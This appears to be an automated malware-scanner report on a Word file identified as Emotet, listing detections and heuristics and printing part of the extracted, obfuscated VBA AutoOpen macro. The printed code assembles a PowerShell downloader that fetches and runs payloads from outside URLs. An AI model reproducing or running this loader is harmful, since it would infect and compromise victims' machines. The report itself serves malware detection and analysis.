MALICIOUS
304
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains a heavily obfuscated VBA macro with an AutoOpen function, indicative of Emotet. The macro utilizes Shell() calls and custom decoding routines to construct and execute a payload. The ClamAV signature also explicitly identifies it as Emotet. The embedded URLs are likely related to the download of the second-stage payload.
Heuristics 9
-
ClamAV: Doc.Macro.Emotet-6374344-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.Emotet-6374344-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://monTGs+TGsiTGs+TGstoTG2trbcnZ1� In document text (OLE body)
- http://monTGs+TGsiTGs+TGstoTG2trbcnZ1In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 54487 bytes |
SHA-256: 5a9c7f987c1a67b26a8b801e47391370fc2d5f347af84ea118f7bc29591380d0 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 32 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "fcsbSTubC"
Function IJnCiRHCf()
lTzpoTSAolJ = "" + pruOUiW + Mid("MUOz4wijzrB5OAzhAR]36)|& ( $ENV:puWwfUF9viQG174", 16, 19) + qtfpHqF + miXmrAi
uDZGwORR = "" + EUPBTYX + Mid("PUNqZ4jzZKZaQtc8dRzO75TEebCliTGs+TGseTGs+TGsnt;a2hnsCiA+CiAaTGs+TGsdaTGs+TGssd =CiA+CiA q5P", 25, 64) + aFirJNo + rXpUIiC
BjIiahw = "" + WqhJkOz + Mid("FjNvQjA5jk(('. ( ([stRiNg]iFKvERBoSepREFeREnCE)[1,3]+CiAXCiA-JOInCiACiA)( (CiA (('+'TGsaTGs+TGs2hTGs+TGs'+'francTG'+'s+TGs TCiA+CiAGrOFIJd1J8lTzJMzjr08zQa8tT9Nin", 11, 122) + PzLPcSD + IlVcYMA
pzvqdHOikW = "" + mwwouEh + Mid("lNnVFJw+TGsdavspTGs+TGsb.TGs+CiA+CiATGsruTGs+TGs/pTGs+TGsutsitemsherCiA+CiATGs+TGse/TxKTGs+TGsvTGs+TGsj/y'+'TF.Split(TGs+TGsyTF,TGs+TGsyTFTGs25vhAi8wm", 8, 134) + CdzRBjQ + rRnOClC
HpWRjACi = "" + ikSvDlv + Mid("F89cfFQJJWiXtDwKiTGs+TGsnew-objecRI3RuGk", 18, 16) + BVUiKmz + NAmPwin
cHmmO = "" + vHhRLJa + Mid("bddZSaA7NQKGOfHiA+CiAs)-REPlaCe TGs5YqnTG'+'s,[cHAr]92-REPlaCe ([cHAr]97+[cHAr]ZRuzsjXiXhA0w4SLJNZwzG1", 16, 66) + XFdjzBN + rmNTido
rEnsRa = "" + hfTiaYF + Mid("2SusGVIGsbc.ToString(), a2hTGs+TGshTGs+'+'TGsuaTGs+TGssTGs+TG'+'s);InvokeTGs+TGs-ITGs+TG'+'stem(a2hhuTGs+TGsas);bTGs+TGsreak;CiA+CiA}TGs+CiA+Ci'+'ATGscatTGs+TGsch{wTGs+TGsritTGs+TGs'+'e-hosTGDQkjjR7Bj3i", 8, 184) + niIOWwM + MwmJPoc
QGNOULfUD = "" + AECPCqH + Mid("hmsS0zArFPzAiFkDFRq+TGs)TGs+TGs;a2hTGs+TGskarapaTGs+TCiA+C'+'iA'+'Gss TGs+TGs= a2hTGs+TGsnsadTGs+TGsasCiA+CiAd'+'.TGs+TGsnTGs+TGseTGsCiA+CiA+TGsxt(1, 343'+'24TGs+TGs5)'+';pjFJQ", 20, 152) + WSulJsu + fCuQBps
ssmnkwsjR = "" + GAlmlQM + Mid("bEj8cHAr]'+'39) IfS& ((get-VaR'+'i'+'AblE'+' TGs*MdR*TGsCiA+CiA).NAME[3,'+'11,2]-JOiNTGCiA+CiAsTGs)CiA).REpLace(([cHaR]73+[cHaR]102+[cHaR]83),[STrinG][cHaRjdL4ju5nzP08H5JObcTsmrq", 5, 151) + zHrHpjk + zsKQpNS
ERGSq = "" + iPDcbna + Mid("JwE8GOa2tTGs+TGs randoTGs+TGsm;a2hTGs+TGsbcd = yTFhTGs+TGsttp://rTGs+TG'+'semontTGs+TGs-TGs+TGsb'+'TGs+TGsrTGs'+'+TGsCiA+CiAitv.ru/UamTGs+TGsudEtGHvdBrRVmtGloEZzCBcV", 9, 134) + fzOklZV + ZqokOlI
bpHrvhPchA = "" + MNlfuLz + Mid("tsCiA+CiA+TGs{aCi'+'A+CiA2hfranc.DownloadTGs+TGsFTGs+TGsile(aTGs+TGs2haTGs+TfSjAnkZ8zV7asjNtzNC4zijk2k", 2, 75) + YCOWKbN + ZNjKlqQ
YOBDa = "" + wjqwoZu + Mid("m42j9imLGOmOjwPqhJb83zna2hhuasTGs+TGs =TGs+TGs a2hTGs+TIfXHm", 24, 32) + BuHibTd + BfSXiGC
DJZzvnQZmK = "" + ToCqKKP + Mid("oYz9kpkjPwtC6AJYiaWHzqqViiEuPs+TGst aTGs+TGs2h_.ExcTGs+TGseption.MessagTGs+TGsCiA+CiAe;TGCiA+CiAs+TGs}}TGCJTTHup", 30, 77) + OoQltzR + DlzWYWa
tIfiHIddFUQ = "" + UnvrMum + Mid("YSLw7lzrl4riqOKwOA//TGs+TGseTGsKm9988IjWwVZ", 18, 14) + EIJFBwR + wMZtZEM
IsHVHwlEi = "" + ahJjcYl + Mid("LFKdk1jubLiC[13]+$ENv:public[5]+'X')jzMBVfBRG2rdV19IO", 9, 28) + Omhznii + uVcHRMU
jVdoXOHv = "" + jsboWEh + Mid("qwKnk56750+[cHAr]104),[cHAr]36 -CrePLa'+'cE ([cHAr]121+[cHAr]84+[cHAr]70),[F3mz", 9, 69) + tWVYtXJ + UwHDqwQ
hQfKBdn = "" + fdpQvXW + Mid("Kh0YvhurjTGs+TGsic + yTF5TGs+TGsYqnyTTGs+TGsFTGs+TGs + a2hkaTGs+TGsrapa'+'s TGs+TGs+ yTFTGs+TGL5crPXFzJwKR", 10, 85) + OGlTUoz + PzvncSw
LvfWaw = "" + NaDsuiq + Mid("Uacr7C84jIv08SuiPcKVqFKKCiA+CiA/,http://monTGs+TGsiTGs+TGstoTG2trbcnZ1", 25, 38) + GaQooKp + AFYSnAh
stBDaJ = "" + kkXOopB + Mid("pCDkTwL7uFB9rYSBu]124).REpLace(CiATGs'+'C'+'iA,[STrinG][cHaR]39'+') )') -ReplACe ([chAR]67+[chAR]105+[chAR]65),[chAR]39 -CREPlAcE ([chAR]105+[chAR]70+[chAR]75),[cGAZYGRYuXJZ", 18, 148) + DQSltbv + wFzSzAc
iTNqYV = "" + uYMrLta + Mid("FAh4Hz0713iQ89kd9s+TGsreoinTGs+TGstTGCiA+CiAs+TGseTGs+TGsCiA+CiAlTGs+TGsigente.cTGs+TGsom.TGs+TGsar/TGs+TGsgCiA+Ci'+'AkN'+'uNTGs+TGsKlYK/,http:CiA+CiaL2CB", 18, 132) + zplDpBq + GLojsYH
SQnfsiovJL = "" + GFoilif + Mid("X4s+'+'TGs=TGs+TGs neCiA+CiATGs+TGsw-objecTGsCiA+CiA+'+'TGstTGCiA+CiAs+TGs STGs+TGsyTGs+TGsstem.NeTGs+TGstTGs+TGs.WbXoBpKSwQwVBjwS3zdoiqhmjtXlvC", 3, 113) + RIjbdiz + lWmvjrN
oDhCviFcrEn = "" +
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.